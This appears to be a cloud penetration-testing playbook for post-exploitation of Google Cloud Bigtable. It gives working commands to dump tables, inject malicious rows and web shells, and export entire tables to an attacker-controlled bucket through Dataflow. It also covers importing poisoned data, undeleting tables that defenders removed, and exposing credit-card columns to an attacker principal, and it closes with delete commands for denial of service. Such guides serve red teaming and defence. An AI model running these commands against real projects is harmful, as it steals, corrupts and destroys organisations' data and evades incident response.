# GCP - Bigtable Post Exploitation
## Bigtable
For more information about Bigtable check:
> [!TIP]
> Install the `cbt` CLI once via the Cloud SDK so the commands below work everywhere:

<details>
<summary>Install cbt CLI</summary>

```bash
gcloud components install cbt
```

</details>
### Read rows

**Permissions:** `bigtable.tables.readRows`
`cbt` ships with the Cloud SDK and talks to the admin/data APIs directly, with no middleware required. Point it at the compromised project/instance and dump rows straight from a table. Limit the scan if you only need a quick peek.
<details>
<summary>Read Bigtable records</summary>

```bash
# Install cbt
gcloud components update
gcloud components install cbt

# Read entries with the creds of gcloud
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
```
</details>
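If you only need a quick peek rather than a full dump, `cbt read` accepts scan limits. A minimal sketch (project, instance and the `user#` row-key prefix are placeholders):

```bash
# List the tables in the instance first
cbt -project=<victim-proj> -instance=<instance-id> ls

# Pull only a handful of rows instead of scanning the whole table
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> count=10

# Scope the scan to interesting row keys (e.g. user records)
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> prefix=user# count=20
```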
### Write rows
**Permissions:** `bigtable.tables.mutateRows` (you will also need `bigtable.tables.readRows` to verify the changes).
Use the same tool to upsert arbitrary cells. This is the fastest way to backdoor configs, drop web shells, or plant poisoned dataset rows.
<details>
<summary>Inject a malicious row</summary>
```bash
# Inject a new row
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin
# Verify the injected row
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#1337
```

</details>

`cbt set` accepts raw bytes via the `@/path` syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.
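For instance, a hedged sketch of pushing raw bytes into a cell and confirming they landed (the `job#42` row key and `config:blob` column are made up for the example):

```bash
# Craft an arbitrary binary payload (could be a serialized protobuf, a compiled blob, etc.)
head -c 256 /dev/urandom > /tmp/payload.bin

# Write the raw bytes into a cell that a downstream service deserializes (illustrative names)
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> job#42 config:blob=@/tmp/payload.bin

# Confirm the bytes were stored
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> prefix=job#42
```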
### Export rows to your bucket

**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`

It's possible to exfiltrate the contents of an entire table to an attacker-controlled bucket by running a Dataflow job that streams the rows into a GCS bucket you control.
> [!NOTE]
> Note that you will need the `iam.serviceAccounts.actAs` permission over some SA with enough permissions to perform the export (by default, unless stated otherwise, the default compute SA will be used).
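When launching the export job below, if the default compute SA is too restricted but you can `actAs` a more privileged one, you should be able to pin the Dataflow job to it with `--service-account-email`. A sketch (the SA email, region and bucket names are placeholders):

```bash
gcloud dataflow jobs run dump-bigtable-$(date +%s) \
  --gcs-location=gs://dataflow-templates-<REGION>/latest/Cloud_Bigtable_to_GCS_Json \
  --project=<PROJECT> \
  --region=<REGION> \
  --service-account-email=<PRIVILEGED-SA>@<PROJECT>.iam.gserviceaccount.com \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,filenamePrefix=dump,outputDirectory=gs://<ATTACKER-BUCKET>/raw-json/ \
  --staging-location=gs://<ATTACKER-BUCKET>/staging/
```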
<details>
<summary>Export Bigtable to a GCS bucket</summary>
```bash
gcloud dataflow jobs run <JOB-NAME> \
  --gcs-location=gs://dataflow-templates-<REGION>/latest/Cloud_Bigtable_to_GCS_Json \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
  --staging-location=gs://<BUCKET>/staging/

# Example
gcloud dataflow jobs run dump-bigtable3 \
  --gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
  --project=gcp-labs-3uis1xlx \
  --region=us-central1 \
  --parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
  --staging-location=gs://deleteme20u9843rhfioue/staging/
```
</details>
> [!NOTE]
> Change the template to `Cloud_Bigtable_to_GCS_Parquet` or `Cloud_Bigtable_to_GCS_SequenceFile` if you want Parquet/SequenceFile output instead of JSON. The permissions are the same; only the template path changes.
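Once the job is launched, you can track it and collect the dump from the attacker bucket, for example (job ID, region and bucket are placeholders; `prefx` matches the `filenamePrefix` used in the example above):

```bash
# Monitor the Dataflow job until it finishes
gcloud dataflow jobs list --project=<PROJECT> --region=<REGION> --status=active
gcloud dataflow jobs show <JOB-ID> --project=<PROJECT> --region=<REGION>

# Retrieve the exported rows from the attacker-controlled bucket
gsutil ls gs://<ATTACKER-BUCKET>/raw-json/
gsutil cat "gs://<ATTACKER-BUCKET>/raw-json/prefx*" | head
```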
### Import rows
**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
It's possible to import content into an entire table from an attacker-controlled bucket by launching a Dataflow job that loads rows from a GCS bucket you control. For this, the attacker first needs to create a parquet file whose data matches the expected schema. The attacker can first export the data in parquet format following the previous technique with the `Cloud_Bigtable_to_GCS_Parquet` template, and then add new records to the downloaded parquet file.
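A rough outline of that round-trip (bucket and file names are illustrative; the parquet edit itself is done offline with any parquet tooling, e.g. pyarrow/pandas):

```bash
# 1. Export the table as Parquet using the previous technique (Cloud_Bigtable_to_GCS_Parquet)

# 2. Download the exported file so the exact schema can be reused
gsutil cp gs://<ATTACKER-BUCKET>/parquet/parquet_prefx-00000-of-00001.parquet /tmp/bigtable_export.parquet

# 3. Append the malicious rows offline, keeping the same schema, and save the result
#    as /tmp/bigtable_import.parquet (e.g. with pyarrow or pandas)

# 4. Upload it to the path the Dataflow import job will read from
gsutil cp /tmp/bigtable_import.parquet gs://<ATTACKER-BUCKET>/import/bigtable_import.parquet
```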
> [!NOTE]
> Note that you will need the `iam.serviceAccounts.actAs` permission over some SA with enough permissions to perform the import (by default, unless stated otherwise, the default compute SA will be used).
<details>
<summary>Import from a GCS bucket to Bigtable</summary>
```bash
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=<REGION> \
--gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/GCS_Parquet_to_Cloud_Bigtable \
--project=<PROJECT> \
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
--staging-location=gs://<BUCKET>/staging/
# Example
gcloud dataflow jobs run import-bt-$(date +%s) \
--region=us-central1 \
--gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
--project=gcp-labs-3uis1xlx \
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
--staging-location=gs://deleteme20u9843rhfioue/staging/
```

</details>

### Restore backups
**Permissions:** `bigtable.backups.restore`, `bigtable.tables.create`
An attacker with these permissions can restore a backup into a new table under their control in order to regain access to old sensitive data.
<details>
<summary>Restore a Bigtable backup</summary>
```bash
# List the available backups
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE>

# Restore a backup into a new table
gcloud bigtable instances tables restore \
  --source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID> \
  --async \
  --destination=<TABLE_ID_NEW> \
  --destination-instance=<INSTANCE_ID_DESTINATION> \
  --project=<PROJECT_ID_DESTINATION>
```
</details>
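Once the restore finishes, the new table can be read like any other, e.g. with `cbt` (IDs are placeholders):

```bash
# Confirm the restored table exists and dump the recovered data
cbt -project=<PROJECT_ID_DESTINATION> -instance=<INSTANCE_ID_DESTINATION> ls
cbt -project=<PROJECT_ID_DESTINATION> -instance=<INSTANCE_ID_DESTINATION> read <TABLE_ID_NEW> count=20
```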
### Undelete tables
**Permissions:** `bigtable.tables.undelete`
Bigtable supports soft-deletion with a grace period (7 days by default). Within this window, an attacker with the `bigtable.tables.undelete` permission can restore a recently deleted table and recover all of its data, potentially regaining access to sensitive information that was assumed to be destroyed.
This is especially useful for:
- Recovering data from tables deleted by defenders during incident response
- Accessing historical data that was deliberately deleted
- Reverting accidental or malicious deletions to maintain persistence
<details>
<summary>Undelete a Bigtable table</summary>
```bash
# List recently deleted tables (requires bigtable.tables.list)
gcloud bigtable instances tables list --instance=<instance-id> \
--show-deleted
# Undelete a table within the retention period
gcloud bigtable instances tables undelete <table-id> \
--instance=<instance-id>
```

</details>

> [!NOTE]
> The undelete operation only works within the configured retention period (7 days by default). After this window expires, the table and its data are permanently deleted and cannot be recovered this way.
### Create Authorized Views
**Permissions:** `bigtable.authorizedViews.create`, `bigtable.tables.readRows`, `bigtable.tables.mutateRows`
Authorized views let you expose a curated subset of a table. Instead of respecting least privilege, use them to publish exactly the sensitive column/row sets you care about and whitelist your own principal.
> [!WARNING]
> The catch is that in order to create an authorized view you also need to be able to read and mutate rows on the base table, so you don't gain any additional access, which makes this technique generally not very useful.
<details>
<summary>Create authorized view</summary>
```bash
cat <<'EOF' > /tmp/credit-cards.json
{
  "subsetView": {
    "rowPrefixes": ["acct#"],
    "familySubsets": {
      "pii": {
        "qualifiers": ["cc_number", "cc_cvv"]
      }
    }
  }
}
EOF

gcloud bigtable authorized-views create card-dump \
  --instance=<INSTANCE-ID> \
  --table=<TABLE-ID> \
  --definition-file=/tmp/credit-cards.json

gcloud bigtable authorized-views add-iam-policy-binding card-dump \
  --instance=<INSTANCE-ID> \
  --table=<TABLE-ID> \
  --member='user:attacker@example.com' \
  --role='roles/bigtable.reader'
```
</details>
Because access is segmented per view, defenders often don't realize you have created a new, highly sensitive endpoint.
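To spot (or double-check) such views on a table, they can be enumerated with `gcloud`; a quick sketch assuming the `card-dump` view created above (instance and table IDs are placeholders):

```bash
# List the authorized views defined on a table
gcloud bigtable authorized-views list --instance=<INSTANCE-ID> --table=<TABLE-ID>

# Inspect the definition and who is allowed to read it
gcloud bigtable authorized-views describe card-dump --instance=<INSTANCE-ID> --table=<TABLE-ID>
gcloud bigtable authorized-views get-iam-policy card-dump --instance=<INSTANCE-ID> --table=<TABLE-ID>
```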
### Read Authorized Views
**Permissions:** `bigtable.authorizedViews.readRows`
If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Keep in mind that the authorized view will likely restrict what you can access from the table. Below is an example using Python:
<details>
<summary>Read from an authorized view (Python)</summary>
```python
from google.cloud import bigtable
from google.cloud.bigtable_v2 import BigtableClient as DataClient
from google.cloud.bigtable_v2 import ReadRowsRequest
# Set your project, instance, table, view id
PROJECT_ID = "gcp-labs-3uis1xlx"
INSTANCE_ID = "avesc-20251118172913"
TABLE_ID = "prod-orders"
AUTHORIZED_VIEW_ID = "auth_view"
client = bigtable.Client(project=PROJECT_ID, admin=True)
instance = client.instance(INSTANCE_ID)
table = instance.table(TABLE_ID)
data_client = DataClient()
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"
request = ReadRowsRequest(
    authorized_view_name=authorized_view_name
)

rows = data_client.read_rows(request=request)

for response in rows:
    for chunk in response.chunks:
        if chunk.row_key:
            row_key = chunk.row_key.decode('utf-8') if isinstance(chunk.row_key, bytes) else chunk.row_key
            print(f"Row: {row_key}")
        if chunk.family_name:
            family = chunk.family_name.value if hasattr(chunk.family_name, 'value') else chunk.family_name
            qualifier = chunk.qualifier.value.decode('utf-8') if hasattr(chunk.qualifier, 'value') else chunk.qualifier.decode('utf-8')
            value = chunk.value.decode('utf-8') if isinstance(chunk.value, bytes) else str(chunk.value)
            print(f"  {family}:{qualifier} = {value}")
```

</details>

### Denial of Service via Delete Operations

**Permissions:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`

Any of the Bigtable delete permissions can be weaponized for denial of service. An attacker holding them can disrupt operations by deleting critical Bigtable resources:

- `bigtable.appProfiles.delete`: Delete application profiles, breaking client connections and routing configuration
- `bigtable.authorizedViews.delete`: Remove authorized views, cutting off legitimate access paths for applications
- `bigtable.authorizedViews.deleteTagBinding`: Remove tag bindings from authorized views
- `bigtable.backups.delete`: Destroy backup snapshots, eliminating disaster recovery options
- `bigtable.clusters.delete`: Delete entire clusters, causing immediate data unavailability
- `bigtable.instances.delete`: Remove complete Bigtable instances, wiping all tables and configuration
- `bigtable.tables.delete`: Delete individual tables, causing data loss and application failures
<details>
<summary>Delete Bigtable resources</summary>
```bash
# Delete a table
gcloud bigtable instances tables delete <TABLE-ID> \
  --instance=<INSTANCE-ID>

# Delete an authorized view
gcloud bigtable authorized-views delete <VIEW-ID> \
  --instance=<INSTANCE-ID> --table=<TABLE-ID>

# Delete a backup
gcloud bigtable backups delete <BACKUP-ID> \
  --instance=<INSTANCE-ID> --cluster=<CLUSTER-ID>

# Delete an app profile
gcloud bigtable app-profiles delete <APP-PROFILE-ID> \
  --instance=<INSTANCE-ID>

# Delete a cluster
gcloud bigtable clusters delete <CLUSTER-ID> \
  --instance=<INSTANCE-ID>

# Delete an entire instance
gcloud bigtable instances delete <INSTANCE-ID>
```
</details>
> [!WARNING]
> Delete operations are usually immediate and irreversible. Make sure backups exist before attempting these commands, as they can cause permanent data loss and severely disrupt services.